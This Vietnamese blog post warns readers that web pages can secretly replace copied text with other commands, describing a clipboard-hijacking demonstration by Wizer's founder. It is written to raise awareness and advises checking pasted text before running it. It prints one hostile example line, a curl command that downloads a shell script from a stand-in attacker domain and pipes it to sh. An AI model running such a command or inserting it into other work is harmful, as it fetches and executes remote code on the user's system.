• Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cẩn thận khi Copy Code từ các trang Web – Bạn có thể bị Hack

AnonyViet by AnonyViet
04/01/2022
in Tin tức
Reading Time: 4 mins read
A A
0

Các Lập trình viên, Sysadmins, nhà nghiên cứu bảo mật và những người yêu thích công nghệ  và tui thường hay Copy-Paste lệnh cấu hình, cài đặt thì các trang Web hướng dẫn cho nhanh, thay vì phải gõ lại từng câu lệnh. Tuy nhiên hành động này được cảnh báo dễ gây nguy hiểm và có thể khiến hệ thống bị Hack bởi khi Copy là 1 lệnh nhưng Paste ra là lệnh khác.

Một chuyên gia bảo mật đã thực hiện một thủ thuật đơn giản sẽ khiến bạn phải suy nghĩ kỹ trước khi copy và dán bất kỳ lệnh nào từ các trang web không tin cậy.

Các bài viết liên quan

DDosify - Công cụ kiểm tra sức chịu tải DDoS của Website 13

DDosify – Công cụ kiểm tra sức chịu tải DDoS của Website

01/07/2022
Cách ẩn Code HTML không cho người khác View Source 14

Cách ẩn Code HTML không cho người khác View Source

29/06/2022
Cách mình hack trang web của một trường học 15

Cách mình hack trang web của một trường học

25/06/2022
Cách Hack tính năng Reset Password trên Website để chiếm quyền User 16

Cách Hack tính năng Reset Password trên Website để chiếm quyền User

21/06/2022

Cẩn thận khi Copy Code từ các trang Web khác - bạn có thể bị Hack

Lỗ hổng từ Clipboard – khay nhớ tạm

Gần đây, Gabriel Friedlander, người sáng lập nền tảng Wizer –  chuyên đào tạo nâng cao nhận thức về bảo mật đã thí nghiệm một vụ Hack đơn giản nhưng đáng ngạc nhiên sẽ khiến bạn phải thận trọng khi Copy các lệnh từ các trang web.

Việc Copy các lệnh thường dùng từ một trang web (ahem, StackOverflow) và dán chúng vào công cụ dòng lệnh (terminal) như CMD Windows hoặc Terminal Linux là điều rất quen thuộc đối với lập trình viên mới vào nghề hoặc những người lười như mình.

Nhưng Friedlander cảnh báo một trang web có thể được thay thế một cách bí mật nội dung của những gì có trên Clipboard của bạn và những gì thực sự được Copy vào khay nhớ tạm của bạn sẽ khác rất nhiều so với những gì bạn định sao chép.

Tệ hơn nữa, nếu không có bước kiểm tra cần thiết, lập trình viên có thể chỉ nhận ra lỗi của họ sau khi dán văn bản, lúc này có thể đã quá muộn.

Bạn có thể thực nghiệm kiểu Hack này tại trang https://www.wizer-training.com/blog/copy-paste.

Hãy thử copy dòng trên trang web, sau đó dán ra notepad hoặc bất cứ đâu.

hack copy paste

Bạn sẽ thấy kết quả không phải là sudo apt update mà là

curl http://attacker-domain:8000/shell.sh | sh

Nhiều người cứ nghĩ là họ đang copy một câu lệnh Update hệ thống của Linux, tưởng chừng như vô hại, nhưng thật ra trong bộ nhớ tạm đang lữu trữ lệnh tải shell.sh và thực thi sau khi tải xong.

Những người dán văn bản có thể có ấn tượng rằng họ đang sao chép cập nhật lệnh sudo apt quen thuộc, vô hại được sử dụng để tìm nạp thông tin cập nhật trên phần mềm được cài đặt trên hệ thống của bạn.

Thật ra khi view-source Website bạn sẽ thấy có một đoạn javascript có chức năng đổi nội dung khi bạn thực hiện lệnh Copy từ trang web đó.

Để khắc phục tình trạng này, bạn có thể dùng một số extension chặn javascript trên Chrome như: ScriptBlock, Disable JavaScript, Toggle JavaScript… nhưng nếu dùng như vậy, khi vào một số trang web dùng javascript sẽ bị lỗi hiển thị. Tốt nhất là khi copy nội dung gì, thì dán vào notepad trước khi xem nó ra đúng nội dung không, sau đó hãy dán vào Terminal

Tags: bảo mậtclipboardCopy Codehackjavascript
Previous Post

Tết nguyên đán 2022 là ngày mấy? 2022 là năm con gì?

Next Post

Cách giả lập iOS bằng Docker

AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Anonymous terra Do Kwon
Tin tức

Anonymous tuyên bố sẽ đưa ‘tội ác’ của Do Kwon ra ánh sáng

27/06/2022
Cuộc sống tiện nghi hơn với tủ lạnh thông minh
Tin tức

Top 6 món đồ công nghệ nhất định phải có trong nhà

27/06/2022
Khám Phá Ngay 4 Cách Giải Trí Trực Tuyến Hay Tại Nhà 2022
Tin tức

Khám Phá Ngay 4 Cách Giải Trí Trực Tuyến Hay Tại Nhà 2022

22/06/2022 - Updated on 25/06/2022
so sanh tinh nang telegram premium
Tin tức

So sánh Telegram miễn phí và Telegram Premium

20/06/2022
top vga 2022
Tin tức

10 Card đồ họa có giá tốt nhất cho game thủ

10/06/2022
ma doc dinh kem file word
Tin tức

Cảnh giác thủ đoạn đính kèm Virus vào File Word mới nhất 2022

31/05/2022
Next Post
Cách giả lập iOS bằng Docker 17

Cách giả lập iOS bằng Docker

guest
guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

0 Comments
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác —

Fshare

Các bài mới

DDosify - Công cụ kiểm tra sức chịu tải DDoS của Website 18

DDosify – Công cụ kiểm tra sức chịu tải DDoS của Website

01/07/2022
Danh sách các lệnh Linux bạn cần phải biết 19

Danh sách các lệnh Linux bạn cần phải biết

30/06/2022
Cách ẩn Code HTML không cho người khác View Source 20

Cách ẩn Code HTML không cho người khác View Source

29/06/2022
Cách cài Windows 11 không cần tài khoản Microsoft bằng Rufus 21

Cách cài Windows 11 không cần tài khoản Microsoft bằng Rufus

28/06/2022
Cách xem lại mật khẩu Wifi trên Andorid, iPhone và máy tính 22

Cách xem lại mật khẩu Wifi trên Andorid, iPhone và máy tính

27/06/2022

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Bài viết mới

  • DDosify – Công cụ kiểm tra sức chịu tải DDoS của Website
  • Danh sách các lệnh Linux bạn cần phải biết
  • Cách ẩn Code HTML không cho người khác View Source
  • Cách cài Windows 11 không cần tài khoản Microsoft bằng Rufus
  • Cách xem lại mật khẩu Wifi trên Andorid, iPhone và máy tính
  • Anonymous tuyên bố sẽ đưa ‘tội ác’ của Do Kwon ra ánh sáng

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 92lottery sun86 stackoverflow tool tài xỉu 68 club 68 game bài

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 92lottery sun86 stackoverflow tool tài xỉu 68 club 68 game bài

wpDiscuz
pixel